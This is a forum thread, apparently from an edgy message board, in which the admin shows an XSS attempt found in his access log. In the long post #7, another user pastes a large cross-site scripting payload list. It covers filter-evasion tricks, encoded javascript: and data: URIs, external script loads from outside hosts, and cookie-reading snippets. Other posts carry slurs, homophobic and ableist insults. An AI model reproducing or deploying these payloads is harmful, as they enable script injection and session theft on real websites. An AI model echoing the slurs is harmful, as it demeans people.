User Controls

lol

  1. #1
    Lanny Bird of Courage
    109.163.234.7 - - [25/Mar/2017:20:45:55 -0400] "GET /post/131680 HTTP/1.1" 302 5 "http://niggasin.space/latest-threads" "this is a test ua <img src=x onerror= alert(999999)  >"


    Ho, what kind of janky ass space station do you think I'm running here?
  2. #2
    NARCassist gollums fat coach
    i dont get it
  3. #3
    SPACE INVADERS

  4. #4
    Sophie Pedophile Tech Support
    I broke my browser.
  5. #5
    I pull up ∆ years later on zaint zattex day
  6. #6
    AngryOnion Big Wig [the nightly self-effacing broadsheet]
    lanny alm9st got hacked in the ass.
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. #7
    -SpectraL coward [the spuriously bluish-lilac bushman]
    <dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>
    <svg><script>prompt&#40 1&#41<i>
    <iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload =confirm(1);>";>
    <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
    <input type="text" value=""onresize=pompt(1) "> // IE 10 docmode
    <a href="&#1;javascript:alert(1)">CLICK ME<a>
    <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)
    <img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>
    <link%20rel=import%20href=http://avlidienbrunn.se/test.php>
    <link/rel=prefetch&#10import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4g>
    <link rel="import" href="data:text/html&comma;&lt;script&gt;alert(document.domain)&lt ;&sol;script&gt;
    <video src=_ onloadstart="alert(1)">
    <iframe%0Aname="javascript:\u0061\u006C\u0065\u0072\u0074(1)" %0Aonload="eval(name)";>
    <math><XSS href="javascript:alert(location)">aaa
    “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
    javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
    javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
    javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
    javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
    javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
    javascript:/*-- >]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img - /style=a:expression&#40&#47&#42'/- /*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms- behavior:url(#default#time2) name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>"
    <sCRiPt>alert(1);</sCRipT>
    <SCriPt>delete alert;alert(1)</sCriPt>
    <script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
    <svg><script>alert&grave;1&grave;<p>
    <svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p>
    "><svg><script>alert`1`
    <script%0a%0dConfirm(1);</script>
    <scr<script>ipt>alert(1)</scr<script>ipt>
    <a href=”http://www.google.com>Clickme</a>
    <a href=”javascript:”>Clickme</a>
    <a href=”javaScrRipt:alert(1)”>Clickme</a>
    <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;">Click<test>
    <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;confirm&lpar;1&rpar;">Click<test>
    <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;1&rpar;" >Click<test>
    "><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
    <a href='javascript:http://@cc_on/confirm%28location%29'>click</a>
    <a href="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">Click<test>
    <a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
    <a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
    <a href="data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt">Click<test>
    <a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>
    <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>
    <form oninput=alert(1)></input></form>
    <q/oncut=alert(1)>
    <body/onhashchange=alert(1)><a href=#>clickit
    --><d/ /ondrag=co\u006efir\u006d(2)>hello.
    "><p id=""onmouseover=\u0070rompt(1) //
    <img src=x onerror=prompt(1);>
    <img/src=aaa.jpg onerror=prompt(1);>
    <video src=x onerror=prompt(1);>
    <audio src=x onerror=prompt(1);>
    <iframe src=x onerror=prompt(1)>
    <video><source onerror="javascript:alert(1)">
    <embed/src=//goo.gl/nlX0P>
    <form action="Javascript:alert(1)"><input type=submit> // Firefox, IE
    <isindex action="javascript:alert(1)" type=image> // Firefox, IE
    <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> Google Chrome, IE
    <isindex x="javascript:" onmouseover="alert(1)" label="test"> // Firefox, IE
    <form/action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK // Mario
    <button form=x>xss<form id=x action="javas&Tab;cript:alert(1)"//
    <form><isindex formaction="java&Tab;s&NewLine&cript&colon;confirm(1)">
    <input type="image" formaction=JaVaScript:alert(0)>
    <form><input type="image" value="submit" formaction=//goo.gl/nlX0P>
    <embed/code=//goo.gl/nlX0P?
    <embed/src=”//goo.gl/nlX0P”>
    <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dallili
    <object/data=”//goo.gl/nlX0P”>
    <object data="javascript:alert(1)"> // FF <object/data="javascript&colon;alert(1)"> // FF <object data="&#x6A;avascript&colon;alert(1)">
    <object data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&# x72;&#x74;&#x28;&#x31;&#x29;">
    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="> // Firefox only
    <object data="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"></object> // Firefox only
    <svg/onload=prompt(1);>
    <marquee/onstart=confirm(2)>/
    <body onload=prompt(1);>
    <marquee/finish=confirm(2)>/
    <select autofocus onfocus=alert(1)>
    <textarea autofocus onfocus=alert(1)>
    <keygen autofocus onfocus=alert(1)>
    <body oninput=alert(document.domain)><input autofocus></br>
    <img src=x onerror="javascript:window.onerror=alert;throw 1">
    <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>
    <script>alert`1`</script>
    <img src=x onerror=prompt`1`>
    <a onmouseover=location=’javascript:alert(1)>click
    <a onmouseover=location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#10 1&#114&#116&#40&#49&#41'>a<a>
    <body onfocus="location='javascrpt:alert(1) >123
    <SCRIPT LANGUAGE="VBScript">%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>
    <body language=vbs onload=alert-1 // IE-8
    <script type=text/vbscript>msgbox document.location</script> // IE 10
    <img language=vbscript src=<b onerror="alert 1"> // IE 8
    <svg/language=vbs onload=msgbox-1
    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg> // By Secalert
    <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario
    <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> // By Secalert
    <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
    <input type="text"value=""onclick="location=window[`atob`]`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21ha W4p`"/>
    <input type="text" value=""onfocus=location='javascript:alert`1`' autofocus""/>
    <svg><div onactivate=alert('Xss') id=xss style=overflow:scroll>
    <div onfocus=alert('xx') id=xss style=display:table>
    <body/onactivate=alert(1)>
    <base href=data:/,0/><script src=alert(1)></script>
    <base href=javascript:/0/><iframe src=,alert(1)></iframe>
    <anything onbeforescriptexecute=confirm(1)>
    <frameset/onpageshow=alert(1)>
    <body/onpageshow=alert(1)>
    <div style=overflow:-webkit-marquee onscroll=alert(1)>
    <div style="-ms-scroll- limit:1px;overflow:scroll;width:1px" onscroll=alert('xss')>
    <object onerror=alert(1)>
    <svg><use xlink:href="data:image&sol;svg&plus;xml&semi;ba &NewLine;se&Tab;64&semi;&comma;PHN2ZyBpZD 0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53M y5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodH RwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3a WR0aD0iMTAwIiBoZWlnaHQ9IjediMCI+DQo8 YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0K GxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lk dGg9IjediMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC 9zdmc+#rectangle" /></svg>
    <audio src="data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4" oncanplay="alert(1)">
    <IFRAME/SRC=JAVASCRIPT:%61%6c%65%72%74%28%31%29></iframe> // Cross Browser (PEPE Vila)
    <SCRIPT/SRC=HTTP://LINKTOJS/></SCRIPT> // Cross Browser
    <SVG/ONLOAD=&#112&#114&#111&#109&#112&#116(1) // Cross Browser
    <SCRIPT/SRC=DATA:,%61%6c%65%72%74%28%31%29></SCRIPT> //Cross Browser (PEPE Vila)
    <SCRIPT/SRC="DATA:TEXT/JAVASCRIPT;BASE64,YSA9CSIJCWMJCW8JCW4JCXMJCXQJCXIJCXUJCXAJCW0JKDEJ KTEJCSIJICA7IEI9W10JICA7QT0JCTIJICA7CWM9CWEJW0EJCV0JICA7QT0JCTUJICA7CW89CWEJW0EJCV0JICA7QT 0JCUEJK0EJLTEJLTEJICA7CW49CWEJW0EJCV0JICA7QT0JIEEJK0EJLTUJICA7CXM9CWEJW0EJCV0JICA7QT0JIEEJCS 0JLTMJICA7CXQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXI9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CX U9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CXA9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CW09CWEJW0E JCV0JICA7QT0JIEEJCS0JLTIJICA7CUQ9CWEJW0EJCV0JICA7QT0JIEEJCS0JLTMJICA7CUU9CWEJW0EJCV0JICA7QT0 JIEEJCS0JLTEJICA7CUY9CWEJW0EJCV0JICA7IEM9ICBCW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV 0JW2MJK28JK24JK3MJK3QJK3IJK3UJK2MJK3QJK28JK3IJCV0JICA7IEMJKHAJK3IJK28JK20JK3AJK3QJK0QJK0YJK0 UJKSAJKCAJKSAJICA7"></SCRIPT>
    \”;alert(1)//
    \\”;alert(1)//
    <script>\u0061\u006C\u0065\u0072\u0074(1)</script> // Unicode escapes
    <script>\u0061\u006C\u0065\u0072\u0074`1`</script> // ES6 Variation
    <script>\u{61}\u{6c}\u{65}\u{72}\u{74}(1)</script> // ES6 Variation
    <script>eval("\x61\x6c\x65\x72\x74(1)");</script> // Hexadecimal escapes using eval
    <script>eval("\141\154\145\162\164`1`")</script> // Octal escapes combined ES6 Diacritical Grave
    <script>setTimeout("a" + "lert" + "(1)");</script> // Using Basic Concatenation
    <img src=a onerror=setInterval(String['fromCharCode'](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function
    <script>setTimeout(/a/.source + /lert/.source + "(1)");</script> // Using source property for concatenation
    [].constructor.constructor("alert" + "(1)")()
    window["alert"](1)
    eval("ale" + (!![]+[])[+!+[]]+(!![]+[])[+[]])(1)
    window["ale" + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)
    alert(document["cook" + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
    alert(this["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ]["cook" + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
    <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#1 14&#109&#40&#49&#41">Clickhere</a>
    <a href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38& #35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#4 9&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49& #38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#3 8&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>
    <script' + Array(999999).join('/') + '>alert(1)<\/script>
    #”><img src=x onerror=prompt(1)>
    <svg/onload=eval(location.hash.slice(1))>?#alert(1)
    <svg/onload=eval(atob(location.hash.slice(1)))>#YWxlcnQoMSkvLw==
    <marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>
    <marquee/onstart=this['innerHTML']=location.hash;>//#<img src=x onerror=alert(document.domain)>
    <marquee/onstart=this['innerHTML']=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>
    <svg%20onload=evt.target.innerHTML=evt.target.ownerDocument.URL>#<img src=/ onerror=alert(domain)>
    <svg onload=evt.target[/innerHT/.source%2b/ML/.source]=evt.target[/ownerDocumen/.source%2b/t/.source][/U R/.source%2b/L/.source]#<img src=/ onerror=alert(domain)>
    <svg/onload=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]#:()
    <svg onload=eval(window.name)//
    <svg/onload=location=name//
    <body/onload=location=name//
    <body/onload=location=write(top)//
    <svg/onload=location=name//>
    location=name//','javascript:alert(1)');
    <svg/onload=location=name//”>CLICK</a>
    <body/onload=URL=name//
    <body/onactivate=URL=name//
    <svg/onload=top[‘loca’%2b’tion’]=name//
    <svg/onload=top[/loca/.source%2b/tion/.source]=name//
    <body/onload=this[/loca/.source%2b/tion/.source]=name//
    <svg/onload=parent[/loca/.source%2b/tion/.source]=name//
    <body/onload=self[/loca/.source%2b/tion/.source]=name//
    <body/onload=window[/loca/.source%2b/tion/.source]=name//
    <svg/onload=body[name]=URL%0d#</svg><img src=x onerror=alert(1)>"
    <scri%00pt>alert(1);</scri%00pt>
    <div style="color:rgb(''&#0;x:expression(alert(1))"></div>
    <div/style="width:expression(confirm(1))">X</div>
    <meta http-equiv="x-ua-compatible" content="ie=7"><iframe src=”//targetsite.com?xss=<div/style="width:expression(confirm(1))">X</div>”
    <meta http-equiv="x-ua-compatible" content="ie=9"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>
    <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3 B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
    <svg %09onload%09=prompt(1)>
    <svg/onload%0B=prompt(1)>
    <svg%09%28%3Bonload=confirm(1);>
    charset=utf-8&v=”><img src=x onerror=prompt(0);>
    charset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
    a=%1B$*H%1BN&b=%20type=image%20src=x%20onerror=alert(document.c haracterSet);//
    <// style=x:expression\28write(1)\29>
    </**/style=x:expression\28write(1)\29>
    <% contenteditable onresize=alert(1)>
  8. #8
    Sophie Pedophile Tech Support

    # Here is some random source code that doesn't have anything to do
    # with anything except for the presence of a Javascript alerts

    kill_self() if poser == True else live()
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. #9
    The masked faggot strikes again. I bet totse 2001 is the one behind the spam all these years.. Probably one of the cuck mods from rdfrn or something.
  10. #10
    Originally posted by Sophie

    # Here is some random source code that doesn't have anything to do
    # with anything except for the presence of a Javascript alerts

    kill_self() if poser == True else live()

    alert("Alert XSS Chat send File Facebook Messenger");
  11. #11
    I bet this guy is totse 2001 faggot alt ^ he fits the profile of both homosexual & retarded.
Jump to Top